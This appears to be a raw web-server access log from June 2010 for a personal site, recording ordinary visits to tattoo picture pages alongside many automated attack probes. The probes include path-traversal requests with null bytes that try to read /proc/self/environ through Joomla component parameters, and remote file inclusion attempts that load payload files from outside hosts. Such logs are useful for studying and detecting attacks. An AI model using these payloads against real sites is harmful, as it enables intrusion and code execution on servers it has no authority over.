74.53.154.162 - - [06/Jun/2010:20:57:05 -0500] "GET //?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
121.190.102.21 - - [06/Jun/2010:20:58:35 -0500] "GET /logs/access_log.1271548800///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.14.126.220 - - [06/Jun/2010:21:02:32 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
216.14.126.220 - - [06/Jun/2010:21:02:32 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
69.73.147.76 - - [06/Jun/2010:21:02:53 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:21:02:53 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
82.99.38.11 - - [06/Jun/2010:21:03:01 -0500] "GET /logs/index.php?option=com_../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.99.38.11 - - [06/Jun/2010:21:03:01 -0500] "GET /index.php?option=com_../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
207.46.13.136 - - [06/Jun/2010:21:03:35 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.136 - - [06/Jun/2010:21:03:36 -0500] "GET /logs/access_log.1227657600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.229 - - [06/Jun/2010:21:04:06 -0500] "GET /logs/access_log.1156723200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.99.38.11 - - [06/Jun/2010:21:05:30 -0500] "GET /logs/index.php?option=com_../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.99.38.11 - - [06/Jun/2010:21:05:30 -0500] "GET /index.php?option=com_../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
69.73.147.76 - - [06/Jun/2010:21:05:35 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:21:05:35 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:21:05:44 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.199.182 - - [06/Jun/2010:21:06:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.73.147.76 - - [06/Jun/2010:21:08:06 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:21:08:06 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:21:08:06 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.14.126.220 - - [06/Jun/2010:21:09:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
216.14.126.220 - - [06/Jun/2010:21:09:45 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
216.14.126.220 - - [06/Jun/2010:21:09:45 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
66.79.184.90 - - [06/Jun/2010:21:10:05 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.79.184.90 - - [06/Jun/2010:21:10:05 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.79.184.90 - - [06/Jun/2010:21:10:05 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.79.184.90 - - [06/Jun/2010:21:10:05 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.73.147.76 - - [06/Jun/2010:21:11:01 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:21:11:01 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.147.76 - - [06/Jun/2010:21:11:01 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
121.190.102.21 - - [06/Jun/2010:21:11:47 -0500] "GET /logs/access_log.1271548800///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:21:11:47 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
121.190.102.21 - - [06/Jun/2010:21:11:47 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 200 8572 "-""Mozilla/5.0"
69.73.147.76 - - [06/Jun/2010:21:13:10 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.46.13.143 - - [06/Jun/2010:21:19:37 -0500] "GET /logs/access_log.1170979200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.90 - - [06/Jun/2010:21:24:07 -0500] "GET /logs/access_log.1154476800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.227.143.132 - - [06/Jun/2010:21:24:12 -0500] "GET /logs/index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [06/Jun/2010:21:24:12 -0500] "GET /index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
72.229.242.233 - - [06/Jun/2010:21:24:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
72.229.242.233 - - [06/Jun/2010:21:24:21 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
72.229.242.233 - - [06/Jun/2010:21:24:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.54.63.138 - - [06/Jun/2010:21:24:44 -0500] "GET /logs/index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.54.63.138 - - [06/Jun/2010:21:24:44 -0500] "GET /index2.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.195.239 - - [06/Jun/2010:21:25:36 -0500] "GET /logs/access_log.1185840000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [06/Jun/2010:21:31:37 -0500] "GET /logs/access_log.1210118400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.141 - - [06/Jun/2010:21:36:06 -0500] "GET /logs/access_log.1156550400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.52 - - [06/Jun/2010:21:42:37 -0500] "GET /logs/ HTTP/1.1" 200 8566 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.143.84.59 - - [06/Jun/2010:21:44:01 -0500] "GET //?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
83.143.84.59 - - [06/Jun/2010:21:44:01 -0500] "GET /logs//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8571 "-""Mozilla/5.0"
83.143.84.59 - - [06/Jun/2010:21:44:01 -0500] "GET /logs/access_log.1271548800//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.23.0.30 - - [06/Jun/2010:21:46:39 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.0.30 - - [06/Jun/2010:21:46:42 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.195.112.180 - - [06/Jun/2010:21:49:57 -0500] "GET /costume/ HTTP/1.0" 200 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.200 - - [06/Jun/2010:21:52:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.177.125 - - [06/Jun/2010:22:00:14 -0500] "GET //?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [06/Jun/2010:22:00:14 -0500] "GET /logs/access_log.1271548800//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.177.125 - - [06/Jun/2010:22:00:15 -0500] "GET /logs//?sourcedir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 8571 "-""Mozilla/5.0"
207.46.13.47 - - [06/Jun/2010:22:02:36 -0500] "GET /logs/access_log.1272672000 HTTP/1.1" 200 502112 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.99.38.11 - - [06/Jun/2010:22:09:02 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.99.38.11 - - [06/Jun/2010:22:09:02 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
207.46.204.239 - - [06/Jun/2010:22:10:36 -0500] "GET /logs/access_log.1166832000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.99.38.11 - - [06/Jun/2010:22:13:40 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
82.99.38.11 - - [06/Jun/2010:22:13:43 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
174.29.169.112 - - [06/Jun/2010:22:15:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:20 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:27 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:28 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:28 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:28 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:28 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:28 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:28 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:31 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:31 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:31 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:31 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:54 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:54 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:54 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:54 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:54 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:54 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:54 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:54 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:55 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:55 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:15:55 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:15 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:15 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
74.53.154.162 - - [06/Jun/2010:22:16:16 -0500] "GET /logs//?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8571 "-""libwww-perl/5.831"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
74.53.154.162 - - [06/Jun/2010:22:16:16 -0500] "GET //?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:16 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
74.53.154.162 - - [06/Jun/2010:22:16:32 -0500] "GET /logs//?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8571 "-""libwww-perl/5.831"
74.53.154.162 - - [06/Jun/2010:22:16:32 -0500] "GET //?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
174.29.169.112 - - [06/Jun/2010:22:16:33 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:33 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:33 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:33 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:33 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:33 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:33 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:34 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:34 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:34 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:34 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
